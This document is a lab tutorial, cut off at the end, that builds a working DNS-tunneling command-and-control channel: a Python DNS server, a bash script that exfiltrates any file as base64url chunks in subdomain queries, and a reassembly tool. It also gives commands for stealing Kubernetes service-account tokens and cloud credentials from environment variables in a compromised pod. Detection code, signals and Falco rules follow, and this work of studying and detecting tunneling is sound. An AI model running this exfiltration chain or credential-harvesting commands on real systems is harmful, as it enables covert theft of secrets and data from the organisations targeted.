DNS Command & Control: TXT Record Tunneling Lab

DNS is the one protocol that almost every firewall allows outbound. Attackers exploit this by encoding stolen data inside DNS queries, where the subdomain labels carry base64-encoded chunks and a custom authoritative DNS server on the other end reassembles them. This technique is used by real-world malware families including SUNBURST, OilRig, and Cobalt Strike's DNS beacon.

This lab builds a complete DNS C2 channel from scratch: a custom DNS server, client exfiltration scripts, server-side reassembly, and detection tools. Everything runs locally with Docker.

How DNS Tunneling Works

Traditional exfiltration rides on HTTPS. DNS tunneling instead hides the data inside the DNS protocol itself. The channel built in this lab works in four steps:

  1. TXT Record Bootstrap: the client queries a TXT record to establish a session. The C2 server responds with a unique session ID embedded in the TXT response.

  2. Subdomain Encoding: the client splits the data into small chunks, base64url-encodes them, and sends each chunk as a subdomain label in an A/CNAME query: <session>.<seq>.<chunk>.textsip.com

  3. CNAME Flow Control: the server responds with CNAME records pointing to next-<session>.textsip.com, which act as an acknowledgment mechanism.

  4. Server-Side Reassembly: the server logs every chunk with its sequence number. A reassembly tool sorts the chunks by sequence number, concatenates them, and decodes the result to recover the original file.
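
The steps above can be sketched end to end in a few lines of Python. This is a minimal illustration rather than the lab's actual client: the helper names encode_chunks, build_qnames, and reassemble are hypothetical, and the 50-character chunk size is borrowed from the exfiltration script later in this lab.

```python
import base64

DOMAIN = "textsip.com"   # lab domain used throughout this article
CHUNK_SIZE = 50          # characters per chunk label; must stay <= 63


def encode_chunks(data: bytes, size: int = CHUNK_SIZE) -> list[str]:
    """Base64url-encode data (padding stripped) and split it into label-sized chunks."""
    encoded = base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")
    return [encoded[i:i + size] for i in range(0, len(encoded), size)]


def build_qnames(session_id: str, chunks: list[str]) -> list[str]:
    """Build <session>.<seq>.<chunk>.<domain> names with zero-padded sequence numbers."""
    return [f"{session_id}.{seq:04d}.{chunk}.{DOMAIN}"
            for seq, chunk in enumerate(chunks)]


def reassemble(qnames: list[str]) -> bytes:
    """Server-side view: sort by sequence number, concatenate, re-pad, decode."""
    parts = []
    for name in qnames:
        # Drop ".textsip.com", then split into session, seq, and chunk.
        _session, seq, chunk = name[: -len(DOMAIN) - 1].split(".", 2)
        parts.append((int(seq), chunk))
    payload = "".join(chunk for _, chunk in sorted(parts))
    return base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4))


secret = b"db_password=hunter2\n" * 5
names = build_qnames("2d965f52", encode_chunks(secret))
recovered = reassemble(list(reversed(names)))  # arrival order does not matter
print(len(names), recovered == secret)
```

Because every query carries its own sequence number, the receiver can tolerate reordering; lost chunks still have to be detected separately.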

Why Attackers Use DNS

  • Firewalls rarely block DNS (port 53 UDP/TCP)
  • DNS queries traverse corporate proxies and NAT transparently
  • Most organizations don't inspect DNS query content
  • Recursive resolvers forward queries to authoritative servers, providing natural routing
  • Low bandwidth is sufficient for credential exfiltration

Architecture

[Figure: DNS C2 architecture]

Lab Setup

Prerequisites

  • Docker and Docker Compose
  • dig command-line tool (part of bind-utils or dnsutils)

Project Structure

dns-c2-lab/
├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── dns_server.py           # C2 DNS server
├── reassemble_dns.py       # Payload reassembly tool
├── analyze_dns_logs.py     # Detection/analysis tool
└── logs/                   # Created at runtime

Dockerfile

FROM python:3.12-slim

WORKDIR /app

COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY dns_server.py .

EXPOSE 53/udp
EXPOSE 53/tcp

# -u disables stdout buffering so the startup lines appear in `docker logs` right away
CMD ["python", "-u", "dns_server.py"]

docker-compose.yml

services:
  textsip-dns:
    build: .
    container_name: textsip-dns
    ports:
      - "5353:53/udp"
      - "5353:53/tcp"
    volumes:
      - ./logs:/app/logs
    restart: unless-stopped

Port 5353 is used to avoid conflicting with your host's DNS resolver on port 53.

requirements.txt

dnslib

Start the Lab

docker compose up -d --build
docker logs -f textsip-dns

You should see:

[+] TextSip DNS lab listening on UDP/TCP 53
[+] Logs: /app/logs
[+] All queries: /app/logs/all_queries.log

The DNS Server

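The server distinguishes four types of tunnel queries (TXT bootstrap, chunk ingestion, session lookup, and next-<session> lookup) and answers NS, SOA, and A queries for the zone as a fallback. The two that carry the protocol are walked through first: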

TXT Bootstrap: Session Creation

When a client queries textsip.com with type TXT, the server issues a new session:

if qtype == "TXT" and qname == DOMAIN:
    session_id = short_uuid()          # e.g., "2d965f52"
    issued_subdomain = f"{session_id}.textsip.com."
    next_subdomain = f"next-{session_id}.textsip.com."

    txt_value = f"ip4:{issued_subdomain.rstrip('.')}"

    reply.add_answer(RR(
        rname=request.q.qname,
        rtype=QTYPE.TXT,
        rclass=1,
        ttl=15,
        rdata=TXT(txt_value),
    ))

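The ip4: prefix makes the TXT response loosely resemble an SPF mechanism to casual observers, although a real SPF record starts with v=spf1 and follows ip4: with an address rather than a hostname.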
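
On the client side, the session ID has to be pulled back out of that TXT value. A minimal sketch of the parsing step, assuming the ip4:<session>.textsip.com format shown above (the function name parse_session_id is hypothetical and not part of the lab code):

```python
def parse_session_id(txt_value: str, domain: str = "textsip.com") -> str:
    """Extract the session ID from a TXT value such as 'ip4:2d965f52.textsip.com'."""
    value = txt_value.strip().strip('"')   # dig +short wraps TXT data in quotes
    prefix, _, host = value.partition(":")
    if prefix != "ip4" or not host.endswith("." + domain):
        raise ValueError(f"unexpected bootstrap value: {txt_value!r}")
    return host[: -len(domain) - 1]        # drop ".textsip.com"


print(parse_session_id('"ip4:2d965f52.textsip.com"'))
```

This mirrors the tr/cut pipeline used with dig later in the lab, with the added benefit that a malformed response raises an error instead of yielding an empty string.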

Chunk Ingestion: Receiving Data

Chunks arrive as subdomain labels in the format <session>.<seq>.<chunk>.textsip.com:

if len(labels) >= 3 and qtype in ("A", "CNAME", "TXT"):
    session_id = labels[0]        # "2d965f52"
    seq = labels[1]               # "0001"
    chunk = ".".join(labels[2:])  # base64url-encoded data

    session["chunks"][seq] = chunk

    reply.add_answer(RR(
        rname=request.q.qname,
        rtype=QTYPE.CNAME,
        rclass=1,
        ttl=15,
        rdata=CNAME(next_subdomain),
    ))
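
One detail matters when parsing these names: base64url is case-sensitive, while DNS names are matched case-insensitively. Whatever splits the query name therefore has to match the domain suffix without lowercasing the chunk. A minimal stdlib sketch of that parsing step (the helper split_chunk_qname and the ChunkQuery tuple are hypothetical, not part of the lab server):

```python
from typing import NamedTuple, Optional

DOMAIN = "textsip.com"


class ChunkQuery(NamedTuple):
    session_id: str
    seq: int
    chunk: str


def split_chunk_qname(qname: str, domain: str = DOMAIN) -> Optional[ChunkQuery]:
    """Parse <session>.<seq>.<chunk>.<domain>; return None for anything else."""
    name = qname.rstrip(".")
    suffix = "." + domain
    # Compare the suffix case-insensitively, but slice the original string
    # so the chunk keeps its exact case.
    if not name.lower().endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) < 3:
        return None
    seq = labels[1]
    if not (seq.isascii() and seq.isdigit()):
        return None
    return ChunkQuery(labels[0].lower(), int(seq), ".".join(labels[2:]))


print(split_chunk_qname("2d965f52.0001.SGVsbG8gV29ybGQ.TextSip.com."))
```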

Entropy Calculation

Every chunk is analyzed for Shannon entropy and encoding patterns. The results are used both for server-side logging and as a detection signal:

def shannon_entropy(value):
    if not value:
        return 0.0
    counts = {}
    for c in value:
        counts[c] = counts.get(c, 0) + 1
    entropy = 0.0
    for count in counts.values():
        p = count / len(value)
        entropy -= p * math.log2(p)
    return round(entropy, 3)

def looks_encoded(value):
    raw = value.replace(".", "").replace("=", "")
    if len(raw) < 8:
        return False
    b32 = set("abcdefghijklmnopqrstuvwxyz234567")
    b64url = set("abcdefghijklmnopqrstuvwxyz"
                 "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_")
    if all(c in b32 for c in raw.lower()):
        return True
    if all(c in b64url for c in raw):
        return True
    return False
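
A quick worked example shows what the entropy score does and does not tell you. The sketch below restates the same formula without rounding and compares a few labels; the sample labels are made up for illustration. One property worth noting is that a label of length n can never score above log2(n), so short chunks stay under any fixed threshold no matter how random they are.

```python
import math
from collections import Counter


def entropy(label: str) -> float:
    """Shannon entropy in bits per character (same formula as shannon_entropy)."""
    if not label:
        return 0.0
    n = len(label)
    # p * log2(1/p) summed over distinct characters, with p = count / n
    return sum((c / n) * math.log2(n / c) for c in Counter(label).values())


for label in ["aaaaaaaa", "mail", "SGVsbG8gV29ybGQ", "abcdefghijklmnop"]:
    bound = math.log2(len(label))
    print(f"{label:<18} len={len(label):<3} "
          f"entropy={entropy(label):.3f} bound={bound:.3f}")
```

The 15-character base64 label from the dig test later in this lab lands well below 4.0 bits, which is one reason entropy works best in combination with label length and query volume.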

Full Server Code

#!/usr/bin/env python3

import os
import uuid
import json
import math
import threading
from datetime import datetime, timezone

from dnslib import RR, QTYPE, TXT, CNAME, SOA, NS, A
from dnslib.server import DNSServer, BaseResolver

DOMAIN = "textsip.com."
NS_HOST = "ns1.textsip.com."
LOG_DIR = "/app/logs"

os.makedirs(LOG_DIR, exist_ok=True)

lock = threading.Lock()
issued_sessions = {}


def now_utc():
    return datetime.now(timezone.utc).isoformat()


def short_uuid():
    return uuid.uuid4().hex[:8]


def normalize_qname(qname):
    return str(qname).lower().rstrip(".") + "."


def strip_domain(qname):
    qname = normalize_qname(qname)
    if qname.endswith(DOMAIN):
        return qname[: -len(DOMAIN)].strip(".")
    return qname.strip(".")


def safe_name(value):
    return value.replace("/", "_").replace("\\", "_").replace("..", "_")


def write_json_log(path, event):
    with open(path, "a") as f:
        f.write(json.dumps(event, sort_keys=True) + "\n")


def log_all(event):
    write_json_log(os.path.join(LOG_DIR, "all_queries.log"), event)


def log_session(session_id, event):
    path = os.path.join(LOG_DIR, f"{safe_name(session_id)}.textsip.com.log")
    write_json_log(path, event)


def get_client(handler):
    try:
        return handler.client_address
    except Exception:
        return "unknown", "unknown"


def shannon_entropy(value):
    if not value:
        return 0.0
    counts = {}
    for c in value:
        counts[c] = counts.get(c, 0) + 1
    entropy = 0.0
    for count in counts.values():
        p = count / len(value)
        entropy -= p * math.log2(p)
    return round(entropy, 3)


def looks_encoded(value):
    raw = value.replace(".", "").replace("=", "")
    if len(raw) < 8:
        return False
    b32 = set("abcdefghijklmnopqrstuvwxyz234567")
    b64url = set(
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_"
    )
    if all(c in b32 for c in raw.lower()):
        return True
    if all(c in b64url for c in raw):
        return True
    return False


def base_event(event_type, request, handler, extra=None):
    qname = normalize_qname(request.q.qname)
    qtype = QTYPE[request.q.qtype]
    client_ip, client_port = get_client(handler)
    stripped = strip_domain(qname)
    labels = [] if stripped == "" else stripped.split(".")

    event = {
        "time": now_utc(),
        "event_type": event_type,
        "client_ip": client_ip,
        "client_port": client_port,
        "qname": qname,
        "qtype": qtype,
        "labels": labels,
        "label_count": len(labels),
        "qname_length": len(qname),
        "max_label_length": max([len(x) for x in labels], default=0),
    }

    if extra:
        event.update(extra)

    return event


class TextSipResolver(BaseResolver):
    def resolve(self, request, handler):
        reply = request.reply()

        qname = normalize_qname(request.q.qname)
        qtype = QTYPE[request.q.qtype]
        labels = strip_domain(qname).split(".") if qname.endswith(DOMAIN) else []

        query_event = base_event("query_seen", request, handler)
        log_all(query_event)

        # TXT bootstrap
        if qtype == "TXT" and qname == DOMAIN:
            with lock:
                session_id = short_uuid()
                issued_subdomain = f"{session_id}.textsip.com."
                next_subdomain = f"next-{session_id}.textsip.com."

                issued_sessions[session_id] = {
                    "session_id": session_id,
                    "issued_subdomain": issued_subdomain,
                    "next_subdomain": next_subdomain,
                    "created_at": now_utc(),
                    "txt_queries": 1,
                    "subdomain_queries": 0,
                    "chunk_queries": 0,
                    "chunks": {},
                }

            txt_value = f"ip4:{issued_subdomain.rstrip('.')}"

            reply.add_answer(
                RR(
                    rname=request.q.qname,
                    rtype=QTYPE.TXT,
                    rclass=1,
                    ttl=15,
                    rdata=TXT(txt_value),
                )
            )
            log_session(session_id, base_event(
                "txt_issued_session", request, handler,
                {"session_id": session_id, "txt_response": txt_value}
            ))
            return reply

        if qname.endswith(DOMAIN):

            # Chunk: <session>.<seq>.<chunk>.textsip.com
            if len(labels) >= 3 and qtype in ("A", "CNAME", "TXT"):
                session_id = labels[0]
                seq = labels[1]
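                # Rebuild the chunk from the original query name: normalize_qname()
                # lowercases the name, which would corrupt case-sensitive base64url.
                raw_labels = str(request.q.qname).rstrip(".").split(".")
                chunk = ".".join(raw_labels[2:len(labels)])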

                with lock:
                    session = issued_sessions.get(session_id)
                    if session:
                        session["chunk_queries"] += 1
                        session["chunks"][seq] = chunk
                        next_subdomain = session["next_subdomain"]
                    else:
                        next_subdomain = f"unknown-session.{DOMAIN}"

                log_session(session_id, base_event(
                    "chunk_received", request, handler,
                    {"session_id": session_id, "seq": seq, "chunk": chunk,
                     "chunk_length": len(chunk),  # read by analyze_dns_logs.py
                     "chunk_entropy": shannon_entropy(chunk),
                     "encoded_like": looks_encoded(chunk)}
                ))

                reply.add_answer(
                    RR(
                        rname=request.q.qname,
                        rtype=QTYPE.CNAME,
                        rclass=1,
                        ttl=15,
                        rdata=CNAME(next_subdomain),
                    )
                )
                return reply

            # Next query: next-<session>.textsip.com
            # Checked first: the single-label session branch below would
            # otherwise swallow A/CNAME queries for next-<session>.
            if len(labels) == 1 and labels[0].startswith("next-"):
                session_id = labels[0].replace("next-", "", 1)
                with lock:
                    session = issued_sessions.get(session_id)
                if session:
                    done_sub = f"done-{session_id}.textsip.com."
                    reply.add_answer(
                        RR(
                            rname=request.q.qname,
                            rtype=QTYPE.CNAME,
                            rclass=1,
                            ttl=15,
                            rdata=CNAME(done_sub),
                        )
                    )
                return reply

            # Session query: <session>.textsip.com
            if len(labels) == 1 and qtype in ("A", "CNAME"):
                session_id = labels[0]
                with lock:
                    session = issued_sessions.get(session_id)
                if session:
                    reply.add_answer(
                        RR(
                            rname=request.q.qname,
                            rtype=QTYPE.CNAME,
                            rclass=1,
                            ttl=15,
                            rdata=CNAME(session["next_subdomain"]),
                        )
                    )
                    return reply
                # Unknown single-label name (e.g. ns1): fall through to the
                # NS / SOA / A fallback instead of returning an empty reply.

        # NS / SOA / A fallback
        if qtype == "NS" and qname == DOMAIN:
            reply.add_answer(RR(rname=DOMAIN, rtype=QTYPE.NS, rclass=1,
                                ttl=60, rdata=NS(NS_HOST)))
        elif qtype == "SOA" and qname == DOMAIN:
            reply.add_answer(RR(rname=DOMAIN, rtype=QTYPE.SOA, rclass=1,
                                ttl=60, rdata=SOA(mname=NS_HOST,
                                rname="admin.textsip.com.",
                                times=(2026060101, 3600, 600, 86400, 60))))
        elif qtype == "A" and qname == NS_HOST:
            reply.add_answer(RR(rname=request.q.qname, rtype=QTYPE.A,
                                rclass=1, ttl=60, rdata=A("127.0.0.1")))

        return reply


if __name__ == "__main__":
    resolver = TextSipResolver()
    udp = DNSServer(resolver, port=53, address="0.0.0.0", tcp=False)
    tcp = DNSServer(resolver, port=53, address="0.0.0.0", tcp=True)
    udp.start_thread()
    tcp.start_thread()

    print("[+] TextSip DNS lab listening on UDP/TCP 53")
    print("[+] Logs: /app/logs")
    print("[+] All queries: /app/logs/all_queries.log")

    try:
        while True:
            threading.Event().wait(1)
    except KeyboardInterrupt:
        print("[-] shutting down")

Client-Side: Data Exfiltration

Quick Test with dig

First, bootstrap a session:

# Get a session ID from the TXT record
SESSION=$(dig @127.0.0.1 -p 5353 -t txt textsip.com +short \
  | tr -d '"' | cut -d: -f2 | cut -d. -f1)

echo "Session: $SESSION"

Send a single chunk:

# Send chunk with sequence 0001
dig @127.0.0.1 -p 5353 ${SESSION}.0001.SGVsbG8gV29ybGQ.textsip.com +short

Check the server logs:

# The log holds one JSON object per line, so json.tool needs --json-lines (Python 3.8+)
python3 -m json.tool --json-lines logs/${SESSION}.textsip.com.log
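
Where dig is not installed (a minimal container image, for example), the same query can be built by hand. The sketch below assembles a DNS question in RFC 1035 wire format using only the standard library. The function names build_query and send_query are hypothetical, and the default server address and port simply mirror this lab's docker-compose mapping.

```python
import socket
import struct


def build_query(qname: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Build a minimal DNS query packet (qtype 1 = A, 16 = TXT)."""
    # Header: ID, flags (RD=1), QDCOUNT=1, ANCOUNT=NSCOUNT=ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = b""
    for label in qname.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"label length out of range: {label!r}")
        question += bytes([len(raw)]) + raw      # length-prefixed label
    # Root label, then QTYPE and QCLASS=IN
    question += b"\x00" + struct.pack("!HH", qtype, 1)
    return header + question


def send_query(qname: str, server: str = "127.0.0.1", port: int = 5353,
               qtype: int = 1, timeout: float = 2.0) -> bytes:
    """Send the query over UDP and return the raw response bytes."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(qname, qtype), (server, port))
        response, _ = sock.recvfrom(4096)
        return response


packet = build_query("2d965f52.0001.SGVsbG8gV29ybGQ.textsip.com")
print(len(packet), packet[:12].hex())
```

Calling send_query("textsip.com", qtype=16) with the lab container running would perform the TXT bootstrap; parsing the response is left out of this sketch.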

Full Exfiltration Script

This script exfiltrates any file over DNS:

#!/usr/bin/env bash
set -euo pipefail

# Configuration
DNS_SERVER="127.0.0.1"
DNS_PORT="5353"
DOMAIN="textsip.com"
CHUNK_SIZE=50
FILE="${1:-}"   # default to empty so `set -u` does not abort before the usage message

if [[ -z "${FILE:-}" ]]; then
    echo "Usage: $0 <file-to-exfiltrate>"
    exit 1
fi

if [[ ! -f "$FILE" ]]; then
    echo "[-] File not found: $FILE"
    exit 1
fi

echo "[*] Target file: $FILE ($(wc -c < "$FILE") bytes)"

# Step 1: Bootstrap session via TXT query
echo "[*] Bootstrapping session..."
SESSION=$(dig @${DNS_SERVER} -p ${DNS_PORT} -t txt ${DOMAIN} +short \
    | tr -d '"' | cut -d: -f2 | cut -d. -f1)

if [[ -z "$SESSION" ]]; then
    echo "[-] Failed to get session ID"
    exit 1
fi

echo "[+] Session: $SESSION"

# Step 2: Encode file as base64url (no padding, URL-safe)
ENCODED=$(base64 < "$FILE" | tr '+/' '-_' | tr -d '=\n')
TOTAL=${#ENCODED}
CHUNKS=$(( (TOTAL + CHUNK_SIZE - 1) / CHUNK_SIZE ))

echo "[*] Encoded size: $TOTAL bytes"
echo "[*] Chunks: $CHUNKS (${CHUNK_SIZE} bytes each)"

# Step 3: Send chunks
SEQ=0
OFFSET=0

while [[ $OFFSET -lt $TOTAL ]]; do
    CHUNK="${ENCODED:$OFFSET:$CHUNK_SIZE}"
    SEQ_PAD=$(printf "%04d" $SEQ)

    QNAME="${SESSION}.${SEQ_PAD}.${CHUNK}.${DOMAIN}"

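    # Do not let a single timed-out query abort the whole run under `set -e`
    dig @${DNS_SERVER} -p ${DNS_PORT} "${QNAME}" +short +timeout=2 +tries=1 > /dev/null 2>&1 \
        || echo "[!] seq=${SEQ_PAD} got no response" >&2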

    echo "[>] seq=${SEQ_PAD} chunk_len=${#CHUNK}"

    SEQ=$((SEQ + 1))
    OFFSET=$((OFFSET + CHUNK_SIZE))

    # Small delay to avoid flooding
    sleep 0.05
done

echo "[+] Done. Sent $SEQ chunks for session $SESSION"
echo "[+] Server log: logs/${SESSION}.textsip.com.log"

Save as exfiltrate.sh and run:

chmod +x exfiltrate.sh

# Exfiltrate /etc/passwd as a test
./exfiltrate.sh /etc/passwd

Exfiltrate Kubernetes Secrets

In a compromised pod, an attacker could exfiltrate service account tokens:

# Inside a compromised K8s pod
./exfiltrate.sh /var/run/secrets/kubernetes.io/serviceaccount/token

Or dump environment variables containing cloud credentials:

env | grep -iE '(aws|azure|gcp|token|secret|key|password)' > /tmp/env_dump.txt
./exfiltrate.sh /tmp/env_dump.txt
rm /tmp/env_dump.txt

Server-Side: Reassembly

After exfiltration, reassemble the chunks on the C2 server:

#!/usr/bin/env python3

import argparse
import base64
import json
import sys
from pathlib import Path


def load_chunks(path):
    chunks = []
    with open(path, "r") as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            try:
                obj = json.loads(line)
            except Exception:
                continue
            if obj.get("event_type") != "chunk_received":
                continue
            seq = obj.get("seq")
            chunk = obj.get("chunk")
            if seq is None or chunk is None:
                continue
            try:
                seq_num = int(seq)
            except Exception:
                continue
            chunks.append((seq_num, chunk, obj))
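    # Keep one entry per sequence number (the last one logged) so that
    # retransmitted queries do not duplicate data in the payload.
    by_seq = {seq_num: (seq_num, chunk, obj) for seq_num, chunk, obj in chunks}
    return sorted(by_seq.values(), key=lambda x: x[0])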


def decode_payload(payload, encoding):
    if encoding == "none":
        return payload.encode()
    if encoding == "base64":
        return base64.b64decode(payload)
    if encoding == "base64url":
        padded = payload + "=" * (-len(payload) % 4)
        return base64.urlsafe_b64decode(padded)
    if encoding == "base32":
        padded = payload + "=" * (-len(payload) % 8)
        return base64.b32decode(padded.upper())
    raise ValueError(f"unsupported encoding: {encoding}")


def main():
    parser = argparse.ArgumentParser(
        description="Reassemble exfiltrated data from DNS session logs."
    )
    parser.add_argument("logfile", help="Path to session log file")
    parser.add_argument("-e", "--encoding", default="base64url",
                        choices=["base64", "base64url", "base32", "none"])
    parser.add_argument("-o", "--output", default="recovered.bin")
    args = parser.parse_args()

    logfile = Path(args.logfile)
    if not logfile.exists():
        print(f"[-] Log file not found: {logfile}")
        sys.exit(1)

    chunks = load_chunks(logfile)
    if not chunks:
        print("[-] No chunk_received events found")
        sys.exit(1)

    seqs = [seq for seq, _, _ in chunks]
    missing = [i for i in range(min(seqs), max(seqs) + 1) if i not in seqs]
    payload = "".join(chunk for _, chunk, _ in chunks)

    print(f"[+] Chunks: {len(chunks)}")
    print(f"[+] Seq range: {min(seqs)} - {max(seqs)}")
    print(f"[+] Missing: {len(missing)}")
    print(f"[+] Encoded size: {len(payload)}")

    if missing:
        print(f"[!] Missing sequences: {missing[:20]}")

    try:
        decoded = decode_payload(payload, args.encoding)
    except Exception as e:
        print(f"[-] Decode failed: {e}")
        sys.exit(1)

    Path(args.output).write_bytes(decoded)
    print(f"[+] Wrote {len(decoded)} bytes to {args.output}")


if __name__ == "__main__":
    main()

Run it:

# Find the session log
ls logs/*.textsip.com.log

# Reassemble
python3 reassemble_dns.py logs/<session>.textsip.com.log \
    -e base64url \
    -o recovered_file.txt

# Verify
diff /etc/passwd recovered_file.txt

Detection & Analysis

Log Analysis Tool

This tool scans DNS logs for tunneling indicators:

#!/usr/bin/env python3

import argparse
import json
from collections import Counter
from pathlib import Path


def read_events(path):
    events = []
    with open(path, "r") as f:
        for line in f:
            try:
                events.append(json.loads(line))
            except Exception:
                pass
    return events


def analyze_file(path):
    events = read_events(path)
    event_types = Counter(e.get("event_type", "unknown") for e in events)
    chunk_events = [e for e in events if e.get("event_type") == "chunk_received"]

    suspicious = []
    for e in chunk_events:
        reasons = []
        # Older server logs carry no chunk_length field; derive it from the chunk.
        chunk_length = e.get("chunk_length", len(e.get("chunk", "")))
        if chunk_length >= 40:
            reasons.append("long_chunk")
        if e.get("chunk_entropy", 0) >= 4.0:
            reasons.append("high_entropy")
        if e.get("encoded_like"):
            reasons.append("encoded_like")
        if e.get("label_count", 0) >= 4:
            reasons.append("many_labels")

        if reasons:
            suspicious.append({
                "time": e.get("time"),
                "client_ip": e.get("client_ip"),
                "seq": e.get("seq"),
                "chunk_length": chunk_length,
                "entropy": e.get("chunk_entropy"),
                "reasons": reasons,
            })

    return {
        "total_events": len(events),
        "event_types": dict(event_types),
        "chunk_events": len(chunk_events),
        "suspicious": suspicious,
    }


def main():
    parser = argparse.ArgumentParser(
        description="Analyze DNS logs for tunneling indicators."
    )
    parser.add_argument("path", help="Log file or directory")
    args = parser.parse_args()

    target = Path(args.path)
    files = sorted(target.glob("*.log")) if target.is_dir() else [target]

    for file in files:
        result = analyze_file(file)
        print(f"\n{'=' * 60}")
        print(f"File: {file}")
        print(f"Total events: {result['total_events']}")
        print(f"Chunk events: {result['chunk_events']}")
        print(f"Suspicious: {len(result['suspicious'])}")

        for item in result["suspicious"][:10]:
            print(f"  seq={item['seq']} len={item['chunk_length']} "
                  f"entropy={item['entropy']} "
                  f"reasons={','.join(item['reasons'])}")


if __name__ == "__main__":
    main()

Run against the logs directory:

python3 analyze_dns_logs.py logs/

Detection Signals

Signal                          | Threshold                 | Why
Shannon entropy per label       | >= 4.0 bits per character | Normal subdomains have low entropy; base64 chunks score roughly 5 or more at typical chunk lengths
Label length                    | >= 40 characters          | Normal subdomains are short; tunnel chunks approach the 63-character limit
Encoded-like characters         | base32/base64url charset  | Normal domains use readable words, not random alphanumerics
Query volume to a single domain | > 50 queries/minute       | Tunneling generates many sequential queries
Unusual TXT query volume        | Baseline deviation        | Bootstrap queries are uncommon for most domains
Sequential subdomain patterns   | <hex>.<digits>.<random>   | The session.seq.chunk pattern is distinctive
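
The query-volume signal is not covered by the log analysis tool above. A minimal sliding-window counter along these lines could fill that gap. The class name QueryRateMonitor is hypothetical, the defaults mirror the 50 queries/minute row in the table, timestamps are assumed to arrive in non-decreasing order, and the parent-domain guess is deliberately naive.

```python
from collections import defaultdict, deque


class QueryRateMonitor:
    """Flag (client, domain) pairs that exceed a query-rate threshold."""

    def __init__(self, threshold: int = 50, window_seconds: float = 60.0):
        self.threshold = threshold
        self.window = window_seconds
        self._seen = defaultdict(deque)   # (client_ip, domain) -> timestamps

    @staticmethod
    def parent_domain(qname: str) -> str:
        # Naive assumption: the last two labels form the registered domain.
        # Names under suffixes such as co.uk need a public-suffix list.
        return ".".join(qname.rstrip(".").lower().split(".")[-2:])

    def observe(self, client_ip: str, qname: str, ts: float) -> bool:
        """Record one query; return True if the pair is now over the threshold."""
        times = self._seen[(client_ip, self.parent_domain(qname))]
        times.append(ts)
        # Evict timestamps that have fallen out of the window.
        while times and ts - times[0] > self.window:
            times.popleft()
        return len(times) > self.threshold


monitor = QueryRateMonitor()
alerts = [
    monitor.observe("10.0.0.5", f"2d965f52.{seq:04d}.QUJDREVG.textsip.com",
                    ts=seq * 0.05)
    for seq in range(60)
]
print(alerts.index(True))  # index of the first query that trips the alert
```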

DNS Tunneling Limits

Understanding the protocol limits helps calibrate detection thresholds:

Constraint                  | Limit              | Impact
Single DNS label            | 63 characters      | Max chunk size per label
Full hostname               | 253 characters     | Total query length including domain
Practical payload per query | 30-50 bytes raw    | After encoding overhead and metadata labels
Throughput                  | ~100-200 bytes/sec | Many small queries, not bulk transfer
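
The payload figures follow from simple arithmetic on the two length limits. The sketch below works it through for this lab's name layout, assuming an 8-character session ID and a 4-digit sequence number as used elsewhere in the article; the function name chunk_capacity is hypothetical.

```python
MAX_LABEL = 63    # characters per DNS label
MAX_NAME = 253    # characters in a full hostname, dots included


def chunk_capacity(domain: str = "textsip.com", session_len: int = 8,
                   seq_len: int = 4, chunk_labels: int = 1) -> tuple[int, int]:
    """Return (encoded characters, raw bytes) that fit in one query name.

    Layout: <session>.<seq>.<chunk label(s)>.<domain>
    """
    # Fixed overhead: session + dot, seq + dot, and dot + domain.
    overhead = session_len + 1 + seq_len + 1 + 1 + len(domain)
    budget = MAX_NAME - overhead
    chars = 0
    for i in range(chunk_labels):
        dot = 1 if i > 0 else 0          # extra labels cost one dot each
        take = min(MAX_LABEL, budget - dot)
        if take <= 0:
            break
        chars += take
        budget -= take + dot
    raw_bytes = chars * 6 // 8           # base64 carries 6 bits per character
    return chars, raw_bytes


print(chunk_capacity())                 # one chunk label
print(chunk_capacity(chunk_labels=4))   # fill the name up to 253 characters
print(50 * 6 // 8)                      # raw bytes in a 50-character chunk
```

With a single chunk label the ceiling is 47 raw bytes per query, and the 50-character chunks used by the exfiltration script carry 37, both inside the 30-50 byte range in the table.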

Falco Rules

- rule: DNS Tunneling via dig
  desc: Detects dig invocations that target the lab domain or are launched from a shell loop
  condition: >
    spawned_process and
    proc.name = "dig" and
    (proc.args contains "textsip" or proc.pcmdline contains "while")
  output: >
    Potential DNS tunneling via dig
    (user=%user.name command=%proc.cmdline parent=%proc.pname)
  priority: WARNING

- rule: Suspicious DNS Exfiltration Script
  desc: Detects base64 spawned from a shell script (shell parent and shell grandparent), a common staging step before DNS exfiltration
  condition: >
    spawned_process and
    proc.name = "base64" and
    proc.pname in ("bash", "sh", "zsh") and
    proc.aname[2] in ("bash", "sh", "zsh")
  output: >
    File encoding detected, possible DNS exfiltration staging
    (user=%user.name command=%proc.cmdline)
  priority: ERROR

Network-Level Detection

# Count unique subdomains per domain (high count = tunneling)
# Note: this lab publishes DNS on host port 5353, so use that port to capture lab traffic
tcpdump -n -i any port 53 2>/dev/null \
  | grep -oP '[\w.-]+\.textsip\.com' \
  | sort -u \
  | wc -l

# Log all DNS queries with tshark
tshark -i any -f "port 53" -T fields \
  -e frame.time -e ip.src -e dns.qry.name -e dns.qry.type \
  > dns_capture.log
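
A capture like the one above can then be summarized per parent domain. This is a minimal sketch, assuming the tab-separated field order produced by the tshark command (time, source IP, query name, query type); the function name unique_subdomains is hypothetical and the sample rows are made up.

```python
from collections import defaultdict


def unique_subdomains(lines, min_fields: int = 4):
    """Map each parent domain to the set of distinct query names seen under it."""
    seen = defaultdict(set)
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) < min_fields or not fields[2]:
            continue                      # skip packets without a query name
        # Lowercased so that case-randomized copies of one name count once.
        qname = fields[2].rstrip(".").lower()
        # Naive assumption: the last two labels form the parent domain,
        # which breaks for suffixes such as co.uk.
        parent = ".".join(qname.split(".")[-2:])
        seen[parent].add(qname)
    return seen


sample = [
    "t0\t10.0.0.5\t2d965f52.0000.QUJD.textsip.com\t1",
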